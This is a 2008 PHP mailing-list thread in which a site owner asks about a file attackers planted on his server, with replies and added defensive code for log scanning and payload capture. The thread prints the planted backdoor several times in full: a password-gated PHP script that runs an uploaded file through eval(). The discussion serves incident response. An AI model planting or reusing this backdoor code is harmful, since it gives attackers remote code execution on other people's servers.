Re: [PHP] Hack question
Al wrote:
> I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., via ftp. And, I've looked carefully for suspect php files.
>
> <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
>
> <?php
> error_reporting(1);
> global $HTTP_SERVER_VARS;
> function say($t) { echo "$t\n"; } ;
> function testdata($t) { say(md5("testdata_$t")); } ;
> echo "<pre>";
> testdata('start');
> if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
>     if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) {
>         eval($code);
>     } else {
>         testdata('f');
>     } ;
> } else {
>     testdata('pass');
> } ;
> testdata('end');
> echo "</pre>";
> ?>

Don't always assume it is PHP. Is Apache running as nobody? If so, it could be Apache using the PUT method to place the file in a writable directory.

--
Jim Lucas

Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them.
Twelfth Night, Act II, Scene V by William Shakespeare

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
Can you explain this in more detail for me? Sounds like this code is providing the entry point for the other hack code.

Greg Bowser wrote:
>> I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for.
>
> It will allow him to upload and execute arbitrary code on your server. Generally speaking, arbitrary code execution is a bad thing. :).
Re: [PHP] Hack question
On Thu, Apr 17, 2008 at 8:15 AM, Al [EMAIL PROTECTED] wrote:
> Can you explain this in more detail for me? Sounds like this code is providing the entry point for the other hack code.

It probably is, by reading the code from the malicious /tmp files (/tmp should not allow any execution, by the way). However, more of an issue is how the exploit code got on there in the first place. Don't just settle for fixing an issue; solve the problem. Otherwise, it'll just happen again and again.

--
/Daniel P. Brown
Dedicated Servers - Intel 2.4GHz w/2TB bandwidth/mo. starting at just $59.99/mo. with no contract!
Dedicated servers, VPS, and hosting from $2.50/mo.
[PHP] Hack question
I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., via ftp. And, I've looked carefully for suspect php files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; } ;
function testdata($t) { say(md5("testdata_$t")); } ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) {
        eval($code);
    } else {
        testdata('f');
    } ;
} else {
    testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
Re: [PHP] Hack question
Al wrote:
> I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., via ftp. And, I've looked carefully for suspect php files.

Hi,

If I look up the md5 digest 'aace99428c50dbe965acc93f3f275cd3', more people on the internet have (had) problems with this kind of hack.

A quick md5 lookup comes with this: Ox93Mdpqme8s

But that doesn't give any Google results, so nobody knows what it is for (or related to).

Do you have any third party software installed? Like a BB or a CMS or whatever?

When these hackers know your site/server is vulnerable they will keep on exploiting it. Even if it just means SMTP relaying for phishing or a HTTP directory for putting malware in.

Keep track of your HTTP logs and see if these URLs are being requested!

Kind regards,

Aschwin Wesselius
Re: [PHP] Hack question
> I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for.

It will allow him to upload and execute arbitrary code on your server. Generally speaking, arbitrary code execution is a bad thing. :).
Re: [PHP] Hack question
On Wed, Apr 16, 2008 at 12:13 PM, Al [EMAIL PROTECTED] wrote:
> I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., via ftp. And, I've looked carefully for suspect php files.
>
> [snip=code]

Al,

It looks to me as though there may be a script that's allowing writing, judging by the all-as-one-string nature of the first script example. Check your Apache logs to see if that string appears, and if so, what script it's attacking. Then review the script. If you need a hand, feel free to contact me privately and we can discuss it further.

--
/Daniel P. Brown
Ask me about: Dedicated servers starting @ $59.99/mo., VPS starting @ $19.99/mo., and shared hosting starting @ $2.50/mo. Unmanaged, managed, and fully-managed!
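Three of the replies point at the same evidence source: Jim suspects Apache itself writing the file through an HTTP PUT, Aschwin says to watch the HTTP logs for requests to the planted URLs, and Daniel says to look for the one-line script string showing up in a request against some site script. The following is an added example (editor's code, not from any of the posters) that runs those three checks over Apache combined-format access log lines. The log lines, the client addresses and the path /images/x.php are constructed placeholders; the URL-encoded `<?php /*payload*/ ?>` in the fourth line is a harmless stand-in for whatever was really injected, and the rule that catches it looks only for `<?php` or `eval(` in the decoded request.

```php
<?php
// Added example: scan Apache combined-format access log lines for
//   1. HTTP PUT requests (Apache writing into a world-writable directory),
//   2. requests to the paths where the planted file turned up (POST = it is being driven),
//   3. PHP source appearing inside a request string (a site script being abused to write it).
// All log lines below are constructed for this example.

$sample_log = <<<'LOG'
203.0.113.5 - - [16/Apr/2008:09:12:01 -0400] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Apr/2008:09:12:09 -0400] "PUT /images/x.php HTTP/1.1" 201 0 "-" "-"
203.0.113.5 - - [16/Apr/2008:09:12:15 -0400] "POST /images/x.php HTTP/1.1" 200 140 "-" "-"
198.51.100.9 - - [16/Apr/2008:09:13:40 -0400] "GET /gallery.php?f=%3C%3Fphp%20%2F%2Apayload%2A%2F%20%3F%3E HTTP/1.1" 200 812 "-" "-"
10.0.0.7 - - [16/Apr/2008:09:14:02 -0400] "GET /images/logo.gif HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
LOG;

// Where the planted file was found on disk, as URL paths (placeholder value).
$planted_paths = ['/images/x.php'];

/**
 * Split one combined-format line into the fields we need; null if it does not parse.
 * Format: ip ident user [time] "METHOD URL PROTO" status bytes "referer" "agent"
 */
function parse_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'url' => $m[4], 'status' => (int) $m[5]];
}

/**
 * Return one [reason, ip, time, method, url] entry per suspicious observation.
 */
function find_suspicious(string $log, array $planted_paths): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        $path    = parse_url($r['url'], PHP_URL_PATH);
        $decoded = urldecode($r['url']);
        $reasons = [];

        // 1. Jim's theory: the file arrived via HTTP PUT.
        if ($r['method'] === 'PUT') {
            $reasons[] = 'HTTP PUT request (file written through Apache)';
        }
        // 2. Aschwin: the planted URL is being requested; a POST is the backdoor being used.
        if (in_array($path, $planted_paths, true)) {
            $reasons[] = 'request to planted file' . ($r['method'] === 'POST' ? ' (POST: backdoor being driven)' : '');
        }
        // 3. Daniel: PHP source in the request means some site script let it be written.
        if (stripos($decoded, '<?php') !== false || stripos($decoded, 'eval(') !== false) {
            $reasons[] = 'PHP code in request string (injection attempt against a site script)';
        }

        foreach ($reasons as $why) {
            $hits[] = [$why, $r['ip'], $r['time'], $r['method'], $r['url']];
        }
    }
    return $hits;
}

// Four observations come out of the sample: PUT and planted-file for line 2,
// planted-file POST for line 3, PHP-in-request for line 4.
foreach (find_suspicious($sample_log, $planted_paths) as [$why, $ip, $time, $method, $url]) {
    printf("%-70s %-13s %s %s %s\n", $why, $ip, $time, $method, $url);
}
```

On a real server, replace `$sample_log` with `file_get_contents()` of the access log (path is site-specific) and fill `$planted_paths` with the directories Al found the file in. The third rule is deliberately loose: a hit only means that request deserves a look at the script it targeted, which is the review step Daniel describes.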
Re: [PHP] Hack question
Al wrote:
> I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., via ftp. And, I've looked carefully for suspect php files.
>
> <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
>
> <?php
> error_reporting(1);
> global $HTTP_SERVER_VARS;
> function say($t) { echo "$t\n"; } ;
> function testdata($t) { say(md5("testdata_$t")); } ;
> echo "<pre>";
> testdata('start');
> if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
>     if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) {
>         eval($code);
>     } else {
>         testdata('f');
>     } ;
> } else {
>     testdata('pass');
> } ;
> testdata('end');
> echo "</pre>";
> ?>

My first suggestion is to disable the use of exec in the disable_functions entry in your php.ini file. I would not allow the call to exec to be completed. So, something like this should work for now:

disable_functions = exec

Also, you could modify the file that is being run to actually capture the uploaded file contents. Change out the exec part and have it log it to a file somewhere. Then you can see what they are actually trying to do.

--
Jim Lucas

Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them.
Twelfth Night, Act II, Scene V by William Shakespeare
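Jim's second suggestion, swapping the execution step for a logger so the uploaded payloads can be read, is the one that yields evidence, and it is worth being precise about why the first does not cover this file: the planted script calls eval(), which is a language construct rather than a function, and disable_functions only removes functions, so `disable_functions = exec` leaves eval() untouched (disabling exec is still reasonable hardening in its own right). Below is an added example of the capture variant (editor's code, not Jim's or Al's): it keeps the planted file's entry conditions (POST field p whose md5 equals the hard-coded digest, upload field f) and its visible output markers, but writes the upload to a directory outside the web root instead of evaluating it. The log directory and its location are assumptions; `$_FILES` is used in place of the old `$HTTP_POST_FILES` name, which is equivalent here.

```php
<?php
// Added example: a defanged stand-in for the planted backdoor file.  Same
// request shape as the original, but the payload is recorded, never executed.
// The capture directory is an assumption; it must be outside the web root and
// writable only by the web server user (nobody, in Al's case).

error_reporting(0);

$capture_dir = '/var/log/backdoor-capture';

/**
 * Handle one request exactly as the original would decide it, but record
 * instead of eval().  Returns 'pass', 'f' or 'captured' for the caller.
 */
function capture(string $dir): string
{
    $digest = 'aace99428c50dbe965acc93f3f275cd3';    // taken from the planted file
    $who    = $_SERVER['REMOTE_ADDR'] ?? 'cli';
    $when   = date('c');
    $log    = "$dir/attempts.log";

    if (!is_dir($dir)) {
        @mkdir($dir, 0700, true);
    }

    // Original: md5($_POST["p"]) == digest, else testdata('pass').
    if (!isset($_POST['p']) || md5($_POST['p']) !== $digest) {
        @file_put_contents($log, "$when $who wrong-or-missing password\n", FILE_APPEND | LOCK_EX);
        return 'pass';
    }
    // Original: unreadable upload, else testdata('f').
    if (!isset($_FILES['f']) || $_FILES['f']['error'] !== UPLOAD_ERR_OK) {
        @file_put_contents($log, "$when $who correct password, no payload\n", FILE_APPEND | LOCK_EX);
        return 'f';
    }

    // Original: eval($code).  Here: store under a content hash so repeated
    // uploads of the same payload collapse into one file.
    $payload = (string) file_get_contents($_FILES['f']['tmp_name']);
    $name    = 'payload-' . sha1($payload) . '.txt';
    @file_put_contents("$dir/$name", $payload, LOCK_EX);
    @file_put_contents($log, "$when $who payload " . strlen($payload) . " bytes -> $name\n", FILE_APPEND | LOCK_EX);
    return 'captured';
}

// Reproduce the original's output markers so whoever drives the backdoor
// sees the same responses and keeps sending payloads to be logged.
function testdata(string $t): void
{
    echo md5("testdata_$t"), "\n";
}

echo "<pre>";
testdata('start');
$result = capture($capture_dir);
// The original printed testdata('f') or testdata('pass') on failure and
// nothing extra on success (the eval'd code produced any further output).
if ($result === 'pass' || $result === 'f') {
    testdata($result);
}
testdata('end');
echo "</pre>";
```

Drop this in place of each copy of the planted file (same path and permissions) while the rest of the investigation continues; the attempts.log then gives the source addresses and timing to line up against the Apache access log, and each payload-*.txt shows what the uploaded code was actually trying to do.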